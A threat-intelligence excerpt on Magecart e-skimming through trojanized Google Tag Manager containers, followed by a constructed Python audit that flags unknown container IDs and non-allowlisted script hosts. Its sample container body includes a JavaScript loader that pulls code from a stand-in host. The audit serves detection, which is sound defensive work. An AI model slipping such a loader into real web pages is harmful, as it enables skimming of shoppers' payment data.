Magecart Groups Abuse Google Tag Manager
Editor’s Note: The following post is an excerpt of a full report by Gemini Advisory. To read the entire analysis, click here to view the full report.
Gemini analysts have observed 316 e-commerce sites infected by Magecart attacks that deploy trojanized Google Tag Manager (GTM) containers since February 4, 2021. These attacks fall under two variants: one that embeds the malicious e-skimmer script in the container and another that uses the container to download the actual e-skimmer script from a separate dual-use domain. Most of the victims for both variants were US-based sites and used the Magento e-commerce platform. Analysis of the two variants suggests that distinct Magecart groups are responsible for each variant.
The shift to e-commerce due to the COVID-19 pandemic has increased interest in card-not-present (CNP) e-skimming activity. As the level of activity increases, so too does the level of effort to mask activity from automated scanners and security researchers. The use of a legitimate service offers an excellent opportunity to hide malicious scripts and thus maintain a foothold on victimized e-commerce sites.
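A defender-side audit for the two variants described above, as an added example that is not from Gemini Advisory's report: it flags GTM container IDs on a page that are missing from the site operator's own inventory, and hosts referenced by a container's script body that are not on an allowlist. The inventory, the allowlist, the sample page and the sample container body are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumptions (constructed): the operator's container inventory and expected script hosts.
OWNED_CONTAINERS = {"GTM-OWNED01"}
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "shop.example"}

GTM_ID = re.compile(r"\bGTM-[A-Z0-9]{4,}\b")
# Absolute or protocol-relative URLs; the host must contain a dot so "// comment" is ignored.
URL = re.compile(r"""(?:https?:)?//[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+[^\s"'<>)]*""")

def unknown_containers(page_html):
    """Container IDs referenced anywhere in the page that are not in the inventory."""
    return sorted(set(GTM_ID.findall(page_html)) - OWNED_CONTAINERS)

def unexpected_hosts(script_text):
    """Hosts referenced by a container's script body that are not allowlisted."""
    hosts = set()
    for url in URL.findall(script_text):
        host = urlparse(url if url.startswith("http") else "https:" + url).hostname
        if host and host not in ALLOWED_HOSTS:
            hosts.add(host)
    return sorted(hosts)

# Constructed checkout page: one owned container and one that nobody registered.
SAMPLE_PAGE = """
<script>(function(w,d,s,l,i){/* standard loader */})(window,document,'script','dataLayer','GTM-OWNED01');</script>
<script>(function(w,d,s,l,i){/* standard loader */})(window,document,'script','dataLayer','GTM-ZZZZ999');</script>
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-ZZZZ999"></iframe></noscript>
"""

# Constructed container body: pulls a second script from a host outside the allowlist.
SAMPLE_CONTAINER_BODY = """
var s=document.createElement('script');
s.src='https://cdn.metrics-sync.example/lib.js';
document.head.appendChild(s);
var ga='//www.google-analytics.com/analytics.js';
"""

if __name__ == "__main__":
    print("containers not in inventory:", unknown_containers(SAMPLE_PAGE))
    print("hosts not on allowlist:", unexpected_hosts(SAMPLE_CONTAINER_BODY))
```

A hit from either function is a lead for manual review of the container's tags, not proof of an e-skimmer; a script embedded entirely inside a container still needs its tag contents inspected.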